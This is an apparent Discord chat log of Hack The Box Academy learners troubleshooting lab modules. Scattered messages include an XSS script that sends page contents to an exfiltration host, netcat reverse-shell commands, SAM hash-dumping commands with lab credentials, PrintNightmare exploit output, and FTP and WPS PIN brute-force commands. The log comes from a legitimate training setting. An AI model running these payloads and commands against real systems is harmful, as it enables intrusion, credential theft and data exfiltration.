#modules
1 messages · Page 350 of 1
actually the deal is
you are working with 172.16.1.5 while you should try the other ip avail
just ipconfig into your MS01 and put that ip to retrieve the powershell base64 command
it will work
the target ip?
generated for the task
target is correct i.e DC01/172.16.1.10
the attacker ip is what i am talking about, the one you are listening from, machine MS01
just try that once and lmk if it works for you
So i do ipconfig, and then the ip i get i use for the reverse shell
yup
ok i will try that thanks
np
Hi, I'm doing Linux privilege escalation on Kernel exploit. I executed my binary, got root but can't access the flag, did I miss something?
are u sure of the path?
ls -la the flag
And for the path it's given:
Now im getting this, and i restarted my academy vpn and also the target so i dont know what the issue is.
forgot to ping or respond to you @midnight galleon
you're missing a command now, strange error message but could be that (edit: why are my fingers eating letters)
double powershell -e
I only did 1 double powershell -e it still has same error
what if you use the IP as the -Target ?
are u in a rbash?
wait let me spawn the target
still not working man, but I've been stuck on this for a while and I'm just gonna skip this one at this point.
wait it didnt work but now i came back to it it just randomly worked after like 30 seconds
thank you broo
I'm glad
Support helped me, was the exploit not working even if I could access root
Medusa -h IP -U user.list -P password.list -M ftp -n 2121 -t 16 this command is correct right?
Because I am trying to brute force ftp in attacking common service module and Medusa just ran through all the users and passwords in the list given to us and it didn't find the right creds
Not the right place
it is
And Medusa should stop once it found the right creds right?
ftp brute force is slow iirc
maybe wordlist issue
It's the wordlist given to us inside of the same module
Medusa should stop once it found the right creds right?
ok lemme check
hey anyone here know how i could start learning to do ethical hacking
Tryhackme
i know how to do python and do cs but ik that wont help me
i have a job set up soon in a company that checks websites for vulnerabilities so i need to learn all about it for the job
Yo everyone this channel is for solving modules inside of hack the box
Everything else goes in general
Create account on HTB verify and chat in general
To idk why but every time I brute force something it keeps going even after I use the -f flag
try hydra tbh
I had to create a file, paste all Medusa stuff in there, ask chatgpt to find any right creds and it found it inside of all that garbage
I would rather cut my balls and sew them back
I fucking hate brute forcing
it is what it is
When I started cybersec I thought there would be a lot of things I don't understand but one day they would make sense
This will never make sense
I put the flag specifically to stop brute forcing after the service found the creds and it keeps going
Fuck me
You go on HTB and you press the big yellow button "sign up"
It won't be bad to make a module about DDOS/DOS attacks
i don't really see the need as they are usually out of scope for pentests and red team assessments
There are blue team modules
there are, but what does that have to do with what you're suggesting
A blue team module for how to detect and defend against DDOS.
seems more like a preventative thing than a detection thing
but could be a mini-module
you can /feedback to suggest
hey guys, if I purchase VIP+ sub... will I get also access to Pwnbox in Academy modules?
no, the two platforms are separate and so are their subscriptions
Well u better figure it out
oh.. that's sad. I wish Academy had a monthly sub that gets you access also to courses / learning paths. To me those are locked under the 600 EUR annual plan.
there is the Student plan, but other than that you'll have to stick with getting cubes monthly
And the payment option is only inserting Credit Card info? I saw in support article option for PayPal, but it does not give me one, when I want to Add Payment Method
i'm not sure about that. you'll have to contact support
I am stuck for the "XSS Filter Bypasses" from the "Advanced XSS and CSRF Exploitation" module. Can someone provide me some guidance?
I used the following encoded script in the vulnerablesite to callback the script from exploit server
3CSCRIPT%20SRC%3Dhttp%3A%2F%2Fexploitserver.htb%3A50406%2Fexploit%3E%3C%2FSCRIPT%3E
Then I tried to use the basic payload on the exploitserver to see if i get back any data, but i get nothing:
var xhr = new XMLHttpRequest();
xhr.open('GET', '/home.php', false);
xhr.withCredentials = true;
xhr.send();
var exfil = new XMLHttpRequest();
exfil.open("GET", "http://exfiltrate.htb/exfil?r=" + btoa(xhr.responseText), false);
exfil.send();
I get back on the exfiltrate.htb only the following request, which didn't come from the vulnerablesite:
/favicon.ico
Host: exfiltrate.htb:33428
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: image/avif,image/webp,image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://exfiltrate.htb:33428/log
Priority: u=6
X-Forwarded-For: 10.30.18.242
X-Forwarded-Host: exfiltrate.htb:33428
X-Forwarded-Server: exfiltrate.htb
Connection: Keep-Alive
I am stuck, and I can't get my mind around it
I have been stuck on the exploiting thick client section on attacking common applications for 3 weeks lol. Is it allowed if someone sends me the answer so I can move past it? I have grown too frustrated with it and it's making me not want to spend time doing the CPTS path anymore.
I haven't done that module, but something that sticks out to me is the script doesn't look like it's fully URL encoded. It might not be that, but I usually URL encode the special chars as well just in case
Yeah, but the input field where I insert that is protected, so if it's not encoded properly you will get an error saying that "some malicious code was detected" or something like that
3CSCRIPT%20SRC%3Dhttp%3A%2F%2Fexploitserver%2Ehtb%3A50406%2Fexploit%3E%3C%2FSCRIPT%3E
I think the problem is the communication between the vulnerable app, the exploitserver and the exfiltrate server. The hint is saying that you should use no port in the payload for the exfiltrate.htb.
I spawned another machine and reset my vpn idk why it keeps doing that. Attacking common services - attacking smb
Nothing is showing in the exfiltrate.htb
The support team is working 24/7?
I am not sure.
No they take days to respond
There is probably a thread for the module online, you can check there for some more hints. Like I said, I haven't done that module
I read everything on the forum regarding this, but as no hints are present, nothing from there is helping
Anyone who finished the module?
@midnight galleon it keeps giving me this
I tried updating it, spawning new boxes, changed vpn, updated python, downloaded another smbmap file, downloaded an smbmap.py file and it still doesn't work
nmap says working?
smbclient
Have you tried from the AttackBox?
Nmap says there are smb shares, also smbclient show me there are shares but I need to see which share has read and write permission and the module uses smbmap
No I don't want to use it
Try to use it
When something that you are sure should be working, is not working. Try it from the AttackBox
use netexec
but if u want to stick to smbmap i will help
which module is it?
Attacking common services - attack smb
It's working on attackbox
Exactly
And it doesn't show me all that garbage that it shows me in vm
I had the same issue for multiple labs and modules
Some tools/commands won't work from your VM, which can be frustrating, but it is what it is
yeah it disconnects from vm but works on pwnbox
might be timeout lemme increase it
@midnight galleon do you also get this?
no i get this
just use netexec 
Hi! I am making a sightless machine but I cannot find the root flag. Anyone in the same situation?:/
sometimes
.
Man this shit is weird af
Why would it work from attackbox but not from other machines? And why you get a different error than me
It's WEIRD
ok
prolly something to do with the vpn
Hello, I'm working on Windows Privilege Escalation with SeImpersonate privilege in the last module.
I think I got the success message but can't understand why the reverse shell is not connected as following:
```
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
```
Listener:
```
root@dmz01:~# nc -nlvp 443
Listening on 0.0.0.0 443
```
Without `PrintSpoofer64.exe` , just nc command `c:\Users\Public\nc.exe 172.16.8.120 443 -e cmd` was working.
The OS is Windows 2019, so I thought that I needed to use PrintSpoofer.
Anyone can give some help?
Yoo
172.16.8.120 is this IP the one you are trying to connect the rev shell to?
Yes, that's DMZ's Internal IP.
Some PowerShell code has been loaded into memory that scans/targets network shares. Leverage the available PowerShell logs to identify from which popular hacking tool this code derives. Answer format (one word): P____V___
Anyone who can help me with this?
i solved this question but am unsure what the intended way to solve it was, can anyone dm me the intended way
it's in the Introduction to Threat Hunting & Hunting With Elastic, Hunting Stuxbot
Hello im new and don't understand cyber security very well, where would the best place to ask questions about securing my devices, my public email address, my IP address, and what can be done with it, and other things of that nature?
if you're here to start learning about cybersecurity, then that's fine. but this server isn't a general online cybersecurity consulting place, and i'm not sure where the best place to ask your question would be
Are there any cloud related labs or pro labs that are cloud related for Azure, GCP, AWS?
Not sure about labs but have you seen: https://app.hackthebox.com/tracks/Cloud-Track
there is prolabs but business only
Thank you!
Hello, for the shells and payloads live engagement. When on the foothold machine, how do you access a browser?
Thank you!
local port forward the service?
but that is too early if u are doing it in order lemme see
I mean I know how to do that. I considered using ligolo, but got a permission denied. I feel like this should be fairly straight forward being that it's at the beginning of the course haha. Yet, I am struggling with this. I need the browser to be able to log into a web page, to upload a msfvenom payload.
oh did u connect with xfreerdp ?
I did.
then you should get a GUI right?
I do have the GUI, but I can't find the browser anywhere. I don't see Firefox, Chrome, Chromium or Safari. I saw Tor browser but that was failing.
firefox is on the jump host, just run firefox in the terminal
Thanks @dark hedge I'll give that a shot.
yeah
u can also install whatever u what
it doesn't have PublicIP tho so u would need to do some file transfering
Can anyone help with this?
Were you able to complete this one? I've been stuck on it for a few hours, I could use some help.
I'm stuck on the last Python step before returning to PowerShell. I keep getting a bunch of errors.
What are the errors?
Guys I'm in attacking common services - attacking sql databases.
For the first question it's asking me to find the password of mssqlsvc. I read on the forum that you have to use responder to steal the hash but it's not letting me do it. Also I tried to impersonate users, I tried to use xp_cmdshell. Like literally everything is denied
Do I have to brute force mssqlsvc password?
Nope
It's saying Excel xlsx file; not supported.
I'm also confused if I need to download setuptools-2.0, and XLRD separately. Or do I download XLRD inside setuptools?
@fathom pendant It's denied when I'm in master and when I'm not in master, it's denied when I'm using mssql or tsql, it's denied when I try to switch user, it's denied when I try to use xp_cmdshell
Denied denied denied
Denied when I try to change advanced options
And denied when I try to look into tables
"Denied " isn't an error
End result is I still can't do anything
Even when I try to login with windows auth denied denied denied
hi so I tried looking for passwords the way it said in the Linux Credential Hunting section of Password Attacks module
when I use for-loops to search for passwords I don't find it
then I can't get laZagne running on target either because I upload it with ftp and it doesn't have the required modules to run and the target is not connected to the Internet
can someone help me with this?
I have password and logged into target as kira
but I'm trying to find Will's credentials on the target Linux box
I don't need you to help me find kira as I already have found her creds
whoever she is
can someone give me a hint as to where I need to look?
I don't have permissions to access sam's smb folder
I don't have permissions to unzip the notes folder
there's a bunch of things I don't have permission to access
and the password isn't "challengePassword" which is something I find in a file
I found that mysql was a user here
which is kind of weird
Sent you a dm
Try something else then
Ceald
You are the number one most unlikable person in here
In the Linux fundamentals module the File System Hierarchy chart is missing /sbin
You want help, but you insult people?
This combination is not very effective in my opinion
No I insult ceald, he always treats me like shit and makes me lose time
Most of the others are cool
@rustic sage what module are you doing and what are you trying to do?
I am stuck for the "XSS Filter Bypasses" from the "Advanced XSS and CSRF Exploitation" module. Can someone provide me some guidance?
try a different filter bypass
Try the owasp XSS payloads page in the section
Or at least I think it's owasp
But there is a bypass payloads page in that section
From what I understand from the section I should first get the pop-up appear on the vulnerablesite, then try to do the exfiltration.
I'm in Windows Privilege Escalation - Windows Desktop Versions.
The error I get after trying to install xlrd is "TypeError: argument of type 'NoneType' is not iterable." I have no idea what that means or how to fix it. Any help?
Hey all! I'm in Shells & Payloads The Live Engagement. Is it possible to complete this section without the hints? As the hints provide information you need to complete the lab, and i cant figure out how i can enumerate it by myself! Thanks to anyone taking the time to read this!
Check the desktop
Doh. Thank you!
It gets everyone
Haha, yeah I was sitting there for a good couple of hours today going through all my enumeration stuff trying to find it. Lesson learned for next time!
Hi all, I'm on the AD Enumeration Module in the Bleeding Edge Vulnerability section, trying to get question #2 and I don't know why I'm getting this error and can't really figure it out. Any help is appreciated thanks.
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[*] Connecting to ncacn_np:172.16.5.5[\PIPE\spoolss]
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.5.5:445 ... OK
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\172.16.5.225\CompData\backupscript.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
Traceback (most recent call last):
File "/usr/local/lib/python3.11/dist-packages/impacket/smbconnection.py", line 543, in writeFile
return self._SMBConnection.writeFile(treeId, fileId, data, offset)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.11/dist-packages/impacket/smb3.py", line 1739, in writeFile
written = self.write(treeId, fileId, writeData, writeOffset, len(writeData))
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.11/dist-packages/impacket/smb3.py", line 1447, in write
if ans.isValidAnswer(STATUS_SUCCESS):
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.11/dist-packages/impacket/smb3structs.py", line 460, in isValidAnswer
raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_PIPE_CLOSING(The specified named pipe is in the closing state.)
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/home/htb-ac-1497512/CVE-2021-1675/CVE-2021-1675.py", line 190, in <module>
main(dce, pDriverPath, options.share)
File "/home/htb-ac-1497512/CVE-2021-1675/CVE-2021-1675.py", line 93, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.11/dist-packages/impacket/dcerpc/v5/rprn.py", line 657, in hRpcAddPrinterDriverEx
return dce.request(request)
^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.11/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 860, in request
self.call(request.opnum, request, uuid)
File "/usr/local/lib/python3.11/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 849, in call
return self.send(DCERPC_RawCall(function, body.getData(), uuid))
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.11/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 1302, in send
self._transport_send(data)
File "/usr/local/lib/python3.11/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 1239, in _transport_send
self._transport.send(rpc_packet.get_packet(), forceWriteAndx = forceWriteAndx, forceRecv = forceRecv)
File "/usr/local/lib/python3.11/dist-packages/impacket/dcerpc/v5/transport.py", line 543, in send
self.__smb_connection.writeFile(self.__tid, self.__handle, data)
File "/usr/local/lib/python3.11/dist-packages/impacket/smbconnection.py", line 545, in writeFile
raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: code: 0xc00000b1 - STATUS_PIPE_CLOSING - The specified named pipe is in the closing state.
Does subbrute take a lot to start?

sam
is q3 of DACL ATTACKS II skills assessment broken? I have a clear path already but it seems Whisker does not work as intended? Btw I have the NTLM hash of one of the local admins in RD09.
why using proxychains? You can do it directly from the attack box.
guys any hint on Exploitation of PDF Generation Vulnerabilities in the Injection Attacks module about what the internal application is? cuz I have been trying different ips and ports and paths, nothing
Better post here:
https://discord.com/channels/473760315293696010/1263635449335910531
It shows no access
Read and follow, #welcome to access
Literally, he had everything just one message above
Hi, Im having a problem with setting up parrot os, for one of the modules, is this the right place to be?
I mean #homelab-sysadm would be more appropriate for setting up tips
But you don't need to do everything from the setting up module
i got this when i rebooted after setting up the LVM
Yeah that's an issue with it not booting
I suggest going to the parrotsec discord and detailing the steps you chose
Heyy @cold star
Hey
Hi guys, any information regarding discount for htb academy in black friday or cyber?
I have never seen discounts at HTB academy on blackfriday before
Check dms
Hi, can someone help me in some doubts regarding C2 tools like evil-winrm/ NC.exe / PowerShell ? Related with the Shells and Payloads module.
Those aren't c2 tools
Also the shells and payloads module generally only requires the knowledge in it
Hello
It kinda sucks that Attacking Common Applications pretty much doesn't give any cubes for the practice of every section.
guys i'm stuck in Privileged Groups section from linux privesc module i already found the flag but its refusing to accept it
Make sure you don't have a space at the beginning or the end of the flag
yup i checked those and i tried to add HTB{} to the flag but its not working
If you found the flag a certain way dont change it by adding HTB{}
yes ofc this is the first thing i did but didn't work
I dont know then. Havent done that module yet
Anybody's done Attacking GraphQL yet? The Information Disclosure section "After executing an introspection query, what is the flag you can exfiltrate?" I'm at a loss to what the heck i'm supposed to do
Hi guys
netexec rdp 10.129.210.6 --local-auth -u Bob -p HTB_@cademy_stdnt! --sam
it says --sam is unrecognizable... as this is originally a crackmapexec command, however crackmap is outdated and no longer maintained, I was wondering how I could use this with netexec
in htb academy they gave the crackmapexec command
Isn't it just one hyphen for the SAM command?
So -sam instead of --sam ?
Could be wrong here as not near computer
isnt that unfortunately
My bad
O you are trying to dump the hashes
well just use something else like impacket
anddddd
When using the rdp protocol can you dump the sam ? Your command is checking credentials against rdp @pine dune
it didnt dump the hashes without sam
ok ill try
try SMB first
ahh I didnt know., thanks for telling
You can't dump the SAM using netexec with the Rdp protocol
i dont understand, why should i rdp to the box when i can do it remotely using netexec
ahh ok
Its just another way. Usually there is more than one way to these tasks. And he is correct
The RDP is to RDP into the machine
use SMB with netexec to dump hashes
do i have to rdp into the machine
what will i do with rdp in the machine?
cant i just do it remotely because i have the creds for the machine?
impacket-secretsdump Administrator:Password123@10.129.210.6
Or do maybe something like this. replace the ip and creds
ok let me try
netexec smb 10.129.210.6 --local-auth -u Bob -p HTB_@cademy_stdnt! --sam
Just do this command and you should be good to go
Session Security ---> Cross-Site Request Forgery (CSRF or XSRF) ---> If the update-profile request was GET-based and no anti-CSRF protections existed, would you still be able to update Ela Stienen's profile through CSRF? Answer format: Yes or No
I tried the <form id="submitMe" action="http://xss.htb.net/api/update-profile" method="GET"> but receive Cannot GET /api/update-profile, maybe I did something wrong?
im a bit confused...why are we doing it over smb? Also ty...is smb the default?
Because you cant do it via RDP protocol. It just doesnt work that way. It is not meant for that. SMB protocol can do more than just sharing files. Like credentialed command execution
I am gonna spill my coffee.
ahh ok ty...also does smb need to be enabled on the target machine for it to work?
So listen it seems you really need to do this module.
https://academy.hackthebox.com/module/details/116
this is next in line for me
password attacks is just before
ahaaa. Well so don't worry then. It will become clearer when you get there.
try using --show at the end of the command
ok hold on
Is there a way to have two machines running simultaneously? Currently working on the Windows Evasion module and for the skills assessment you have to develop the malware and then test it on the target machine. I am now booting the development machine, shutting it down to boot the target machine just to find out that it got flagged there, then having to shut it down just to boot up the development machine until it works.. that's way too cumbersome
Yea there is. You just boot both of them...
It'd be very dumb not having tested that out beforehand lmao
If I do that the other machine is in the state "Checking machine state" and shutting down
Well thats weird, but i havent done that module so not sure
Gotta check back with the support then, but thanks nonetheless
I didn't notice a way to do it. PITA.
Good day everyone
I have question regarding this module "Password Attacks"
Specifically in the section : "Network Services" https://academy.hackthebox.com/module/147/section/1327
Exactly in the "Question 1 : Find the user for the WinRM service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer."
So I realised first that cme (CrackMapExec) is not installed in pwnbox, so I did that manually by cloning the repo "git clone https://github.com/byt3bl33d3r/CrackMapExec", then "cd CrackMapExec", then "python3 -m pip install ."
after that I got cme
So I used it "crackmapexec winrm 10.129.230.39 -u username.list -p password.list"
But I am getting this result :
""
[eu-academy-6]-[10.10.12.15]-[htb-ac-745587@htb-v5yutstpjs]-[~]
$ crackmapexec winrm 10.129.230.39 -u username.list -p password.list
SMB 10.129.230.39 5985 WINSRV [] Windows 10.0 Build 17763 (name:WINSRV) (domain:WINSRV)
HTTP 10.129.230.39 5985 WINSRV [] http://10.129.230.39:5985/wsman
HTTP 10.129.230.39 5985 WINSRV [-] WINSRV\username.list:password.list
""
Which I believe is wrong (since I looked at other solutions and they show that I should get something like this:)
""
SMB 10.129.202.136 5985 NONE [] None (name:10.129.202.136) (domain:None)
HTTP 10.129.202.136 5985 NONE [] http://10.129.202.136:5985/wsman
.
.
.
WINRM 10.129.202.136 5985 NONE [-] None\john:batman
WINRM 10.129.202.136 5985 NONE [-] None\john:password
WINRM 10.129.202.136 5985 NONE [-] None\john:iloveyou
WINRM 10.129.202.136 5985 NONE [-] None\john:princess
WINRM 10.129.202.136 5985 NONE [+] None\john:november (Pwn3d!)
""
And the question is:
What did I do wrong?
First use nxc. crackmap is deprecated at this point
oh thx
I tried now that
but it gives me errors "" ImportError: cannot import name 'WIN_VERSIONS' from 'impacket.smb3' ""
Tried to fix it, it sounds fixed ("" pip show impacket "" "" pip install --upgrade impacket "")
then I run
""
$ nxc winrm 10.129.230.39 -u username.list -p password.list
WINRM 10.129.230.39 5985 WINSRV [*] Windows 10 / Server 2019 Build 17763 (name:WINSRV) (domain:WINSRV)
WINRM 10.129.230.39 5985 WINSRV [-] WINSRV\username.list:password.list
""
maybe this section needs to be updated I guess, since it is out of date
are these username.list:password.list files in the location from which you are running nxc? try the full path
Guided Lab: Traffic Analysis Workflow
https://academy.hackthebox.com/module/81/section/962#questionsDiv
OK I'm stuck. The Worksheet Answer file Walkthrough Answers.md has completely different IP Addresses from my live capture. Should I be using just the supporting packet file from the Resources tab? This is REALLY frustrating, this is my first HTB guided lab and it's really poorly constructed!!!! Any help would be greatly appreciated. Thank you
You get frustrated too easily :D. Try harder
Its almost like HTB sets it up that way.
anyone got an idea why ?
I am doing that module next
omg there was two flags i thought they were the same but one of them had one more letter no way i wasted so much time zzzzz
Sometimes it happens
Attacking Common Applications > GitLab - Discovery and Enumeration
Why is the box throwing a 502? VPN issue or...?
Fixed itself anyway, but thanks.
Just refreshed the page and it started working.
Hello, I have some issues understanding the first question https://academy.hackthebox.com/module/147/section/1639
Connect to the target machine using RDP and the provided creds. Export all tickets present on the computer. How many users TGT did you collect?
I exported TGT tickets via mimikatz but how do I know how many of these are related to users?
NVM: solved
i need help regarding advanced deserialization attacks JSON, it requires .NET 4.8 but its not possible to install it what to do
im getting this error im not sure if its because of .net version
why isn't it possible to install?
4.8 is preinstalled with win 11, you can also just download it from microsoft's website
You guys waiting for the new machine?
no
hello! can somebody help me with Certified Machine? Thanks!
There is a #boxes thread. This is only for Academy modules.
Don't have access..
gotcha
Are you a new team member?
no
Intro to Whitebox pentest
Final Assessment, Patching question
I pasted the patched code and Injection did fail
So my patch is correct right, Then why it is not showing flag
I'm just going to take a wild guess. But you didn't write your patch within the function
Yes correct it was before function call. I'll try that
Hey guys I'm kind of stuck on the last 2 exercises of the skills assessment in the Attacking WPS module. I tried to brute force the pin but the AP keeps locking out. The problem is, we don't have mdk4 in the machine I RDP to in order to crash the AP using authentication DoS and get rid of the locking. Did anyone complete the module yet? It's pretty new, it would be great if anyone can help me. BTW, I already tried a pixie dust attack, both APs are not vulnerable to it. I also got a list of default pins using the APs' BSSIDs and stored them in a variable in my script to iterate over each likely pin. The problem, like I said, is that I keep getting locked, and the only way I know of bypassing this is through flooding the access point in order to reset, which we can't do since we don't have mdk4
There is a script in the module that loops the PIN codes with a time delay so it doesn't lock. Use the list with possible default pins and that script.
I did, the problem is that I keep getting locked out... i used the same script: #!/bin/bash
#We add generated PINs into this list
PINS='<pin list separated by space>'
for PIN in $PINS
do
echo Attempting PIN: $PIN
sudo reaver --max-attempts=1 -l 100 -r 3:45 -i mon0 -b 60:38:E0:A2:3D:2A -c 1 -p $PIN
done
echo "PIN Guesses Complete"
Doesnt the AP unlock after 1 min or something?
it does but then it locks again after one trial, did you finish the module yet?
yes. I just dont remember exactly what was the deal
just to make sure, did you use mdk4 at all ? or did you just rely solely on the script? because at this point brute forcing the PIN seems to be the only option i just need to know how to bypass the locking
there was no mdk.
yo i am on the skills assessment for attacking web applications w/ ffuf, i installed the ffuf program cause the "update" and i did the whole echoing the ip address to be academy.htb but a small thing appeared for me when i entered ||ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:PORT/ || and many other formats of this. nothing seemed to be gained from the fuzzing, idk why that is but yeah
Because your command isn't fuzzing anything
To fuzz for subdomains in this context you need to add -H " HOST: FUZZ.academy.htb" (note you'll also potentially need to filter)
could you get back to me if you remember
oh wrong channel
Dumping lsass using procdump in sliver does not seem to work anymore.
hey it's acceptable to use htb forums to solve technical difficulties or errors right?
or should i not get into the habit of doing that
like just now i had to fix a metasploit module and there's no way i would have figured out the solution myself
Hi there looking at the Active Directory LDAP module and specifically the LDAP Overview section. I'm trying to get the How many users exist in the INLANEFREIGHT.LOCAL domain? question but I can't seem to get the answer. I tried running || Get-ADObject -LDAPFilter '(objectClass=user)' -SearchBase 'DC=INLANEFREIGHT,DC=LOCAL' | measure|| but the number of users returned there are not the same as what the module wants. Am I missing something conceptually here in how I'm approaching this? I would think this would grab the users appropriately.
EDIT: Managed to solve this; for those curious the query was returning extra objects that were not of the right type so I was getting extra results; had to change the command being run.
Hello,
I have a question regarding "Analyze the event with ID 4624, that took place on 8/3/2022 at 10:23:25. Conduct a similar investigation as outlined in this section and provide the name of the executable responsible for the modification of the auditing settings as your answer. Answer format: T_W_____.exe". I conducted an analysis similar to the one outlined in this section and was able to find the solution manually. However, for the next question, I successfully wrote a custom query to solve it.
In the first question's case, I attempted to create a custom query to search within a specific timeframe, but I keep receiving an "invalid query" message. I'm wondering if anyone else has managed to solve this using a custom query that filters by timeframe (e.g. 2024-11-08T10:23:25.000Z - 2024-13-08T10:23:25.000Z). Note: I did not experience any issue when using a custom query that filters for a specific time.
(CDSA).
Hi all;
Excited to be here, it's my first time, and I have a question regarding feroxbuster performance.
While I was scanning the target IP:PORT with the recursive option etc., I observed that the scan ran at ~1000/sec and after a while was distributed within L1-L3 at ~300/sec.
I wonder if fuzzing performance depends on the machine's CPU/RAM and/or my internet speed?
My execution command was the following:
$ feroxbuster -u http://94.237.59.119:50298/recursive_fuzz -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .php,.html -t 200 -C 400,404,401
Depends, mostly it's constrained by both ends of the network speed (aka internet speed of the server you are targeting and your internet speed) as well as how fast the target application is willing to consume the data. If you end up sending data too fast some applications will think you are trying to DoS the app and will stop responding for a period of time. This is why a lot of fuzzing applications have a backoff approach where they may start off fast and then slow down a bit down the line when they get a better idea of how fast the application is willing to respond.
That being said I don't know if this is 100% the case here as I'm not clear on what you mean by "distributed within L1-L3" but hopefully that might help conceptually r.e possible approaches feroxbuster is taking.
I have filtered the input, Manually tested, Now code execution is not possible.
I am getting output when ran locally
Output format same as original output or should I log password in a different format.
Hey tek, thanks for answering. I think I solved the issue. I changed my VM from NAT to bridged network and suddenly the scan afterwards jumped from ~1000/sec to ~6500/sec. Once feroxbuster reached L3 the performance was distributed/shared among L1 to L3 with around ~4500/sec each.
I should maybe also consider throttling down the scan in order to prevent security mechanisms on the target IP:PORT from causing window-size loss while data traffic is ongoing.
Nice, glad that worked! And yeah on real world tests you'd likely want to scale it down; I've seen similar things with stuff like NMap where one would skip over services on hosts if you pushed it to go too fast as the target host couldn't keep up or had security controls in place.
I'm on the command injection skill assessment. I've been injecting on GET /index.php?to=tmp with whoami and pwd and nothing is coming back in terms of filtering. Any tips?
Looking at the Active Directory LDAP module and its Active Directory Search Filters section, and am stuck on the question Find the name of an account with a ServicePrincipalName set that is also a member of the Protected Users group.
I was under the impression that this had already been covered in the course materials but the users I got back don't seem to be accepted as correct answers?
Possible it may be blind command injection by any chance whereby it executes the command but doesn't return the results back to you?
I was thinking that but to find the flag I need to enumerate where I am on the server
Did you test every parameter?
I believe so
You didn't mention which module/section so it may be a while before you get help. Also it looks like you're spoiling some content you should delete your spoiler tag.
Did you break out the original command
Thanks reworded the question and deleted the spoiler section, let me know if it needs further updates.
Pretty sure you need to use the LDAP filter that looks in the protected group.
Yeah I did
Dm the command
hi
On the AD Bloodhound module - Edges section, are we supposed to RDP with user grace? I can't with the given credentials. I tried via evil and psexec, I couldn't either.
Trying to complete the "ForceChangePassword" edge attack.
Hmm thought I had that already, that's why I'm confused. Unless I'm meant to be searching for a different protected group than the one the module mentions?
the question itself says which group.. the Protected Users group
or you can search spn's i guess
Mess around with different functions
Hi everyone, I'm a lil bit stuck on the Wi-Fi Penetration Testing Basics - Skills Assessment. I managed to answer the first question. I'm trying to capture traffic to then try to crack it with aircrack-ng but didn't manage to. Any hint?
bump?
Hi everyone, I'd like to inquire about the upcoming University CTF competition. Can a recent graduate whose school email has been deactivated participate?
is that possible ?!
[eu-academy-6]-[10.10.15.69]-[htb-ac-745983@htb-ul6aspltvo]-[~]
$ locate username.list
[eu-academy-6]-[10.10.15.69]-[htb-ac-745983@htb-ul6aspltvo]-[~]
$ locate password.list
[eu-academy-6]-[10.10.15.69]-[htb-ac-745983@htb-ul6aspltvo]-[~]
$
I am stuck here now
you dont have the files with the usernames and passwords
correct !
But I am using the instance of pwnbox
shouldn't they be there by default?
I mean the usernames and passwords ?
aaaaaaaah
I found an attachment
to download
Password-attacks.zip
Yea !
It works finally
Thanks @final shale
That's not how it works
You'll still need to install or download the occasional wordlist here or there
Yea
Make sure not to post spoilers about the module
Can anyone help me with this?
you should edit that as it gives a lot of the skill assessment away
When I ask too simple questions, it's not good; when I ask a very complex question with a lot of details, it's not good again. I don't understand this Discord server at all..
you can ask questions without spoiling content
I edited it, delete everything
as for your question, maybe try getting another page
So, yesterday i found the good payload to use on vulnerablesite to callback the script from exploitserver and i got something back on the exfiltrate server. I got errors, something regarding Network
Tried that already.
try again
I see the hint about not using any port, but it says only about the exfiltrate server. Should I use the port in both other 2 URLs, but not on exfiltrate, or should I not use ports at all?
I finished AEN yesterday, have some problems maybe someone encountered them as well:
- For some reason, I had some troubles with ligolo-ng when it came to file transfers? Receiving reverse shells was no problem, but I couldn't get anything when attempting file transfer from the windows box using certutil, curl, etc
- I had to take multiple hints from the questions during the process, would dante be a good additional practice to refine methodology for cpts?
Heyo just wanted to follow up, got it in the end, looks like I misunderstood the question and in my head changed its wording. Appreciate the patience
/@cloud urchin
DM me
sup guys
Is this starting over?
no idea what you're doing
Brute forcing ftp
when asking for help make sure to include the module/section and question you're stuck on
Looking for a nudge on the Linux privesc skill assessment. For flag 4, I have the creds I think I need but they don't seem to work when logging into the application. I don't think I'm missing anything, I'm not sure if it is a lab issue or not?
Darn it to biscuits! I'm in Documentation and Reporting, I cannot get tmux with me. I'm following the steps as outlined in the module, but it's not saving, and I can't even get the panes to split. What do?
No I think it's my vm
I always got the same problem with brute forcing
impossible to tell since you didn't include any info
